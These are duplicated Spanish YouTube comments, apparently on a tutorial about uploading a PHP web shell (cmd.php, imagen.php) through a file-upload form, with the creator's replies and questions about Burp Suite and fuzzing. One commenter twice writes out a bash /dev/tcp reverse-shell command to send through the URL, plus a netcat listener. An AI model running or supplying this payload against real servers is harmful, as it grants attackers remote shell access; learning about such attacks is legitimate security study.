@@ElPinguinoDeMario tranquilo,que no critico lo que haces tio :), me parece genial, pero estoy seguro que la mayoria de admin de redes son tan flojos que no van a activar la opcion de proteccion php. Igual el shell se sube en una foto o cualquier otra cosa (hasta en el url) =D
@@manclar noo pero no lo dije con mala intención jaja al contrario, lo que pasa que por escrito puede sonar diferente pero para nada era la intención 😅
Una pregunta: Se podria ejecutar desde la propia URL: cmd=bash -c "bash -i >& /dev/tcp/10.10.16.27/443 0>&1" mientras estás en escucha con nc -nlvp 443 para obtener la reverse shell? Si alguien puede responder :)
Muchas gracias!! Burp suite sirve principalmente para interceptar peticiones http y poder manipularlas antes de enviarlas a su destino, de tal forma que podremos hacer Hacking web de una forma muy cómoda 👍🏻
Hola!! En este caso dentro de la carpeta uploads el archivo siempre se llama imagen.php, pero en otras webs lo normal es que el fichero tenga el mismo nombre que le ponemos, es decir, cmd.php 👍🏻😁
yo agradeciendo en un discurso de la uni . yo: quisiera agradecer a la persona que me enseño a hacker y seguir adelante con mis sueños- *mi profe se esta levantando* yo: SIENTATE... *se sienta el profe* *se levanta el pinguieno mario*
Estoy estudiando ciberseguridad en "The bridge" y aprendo más aquí contigo, colega...
Finalmente el video que te habia pedido!!!
Me alegro mucho!! Seguiré trayendo vídeos similares 👀
Muy buen video bro, muy facil de entender y buena info
Muchas gracias!! Se hace lo que se puede 😁👍🏻
Tremenda informacion, excelente pero tambien muy peligrosa!
Exacto!! Por eso es tan importante conocerlo 😁
@@ElPinguinoDeMario tranquilo,que no critico lo que haces tio :), me parece genial, pero estoy seguro que la mayoria de admin de redes son tan flojos que no van a activar la opcion de proteccion php. Igual el shell se sube en una foto o cualquier otra cosa (hasta en el url) =D
@@manclar noo pero no lo dije con mala intención jaja al contrario, lo que pasa que por escrito puede sonar diferente pero para nada era la intención 😅
A mí el servidor de python sí me recibe la conexión. Pero el de netcat no. ¿Qué puede ser?
Una pregunta:
Se podria ejecutar desde la propia URL:
cmd=bash -c "bash -i >& /dev/tcp/10.10.16.27/443 0>&1"
mientras estás en escucha con
nc -nlvp 443 para obtener la reverse shell? Si alguien puede responder :)
y como saber en que parte quedo subido el archivo en la otra maquina... ? no entiendo para saber tener el acceso remoto
tienes que buscar el directorio de la pag. Si no lo sabes tienes que hacer fuzzing.
y no podrias subir directamente el index.html para ejecutarlo en el servidor web simplente entrando al directorio?
Qué bueno, ¿Pero para qué sirve el burp suite? Es para cifrar código?
Muchas gracias!! Burp suite sirve principalmente para interceptar peticiones http y poder manipularlas antes de enviarlas a su destino, de tal forma que podremos hacer Hacking web de una forma muy cómoda 👍🏻
Sería muy interesante que alguien hiciera un vídeo explicando cómo saltar los bloqueos de los router al hacer auditoría
Me lo apunto 💪🏻
Gracias master
Muchas gracias a ti como siempre por el apoyo!! 😁💪🏻
podrias hacer un video con nuclei
El archivo malin era cmd.php o imagen.php?
Hola!! En este caso dentro de la carpeta uploads el archivo siempre se llama imagen.php, pero en otras webs lo normal es que el fichero tenga el mismo nombre que le ponemos, es decir, cmd.php 👍🏻😁
@@ElPinguinoDeMario ah ok. Gracias!
yo agradeciendo en un discurso de la uni .
yo: quisiera agradecer a la persona que me enseño a hacker y seguir adelante con mis sueños-
*mi profe se esta levantando*
yo: SIENTATE...
*se sienta el profe*
*se levanta el pinguieno mario*
Me alegran mucho este tipo de comentarios 😁 muchísimas gracias!!! Me alegro que los vídeos sean de utilidad y que hayas aprendido 💪🏻💪🏻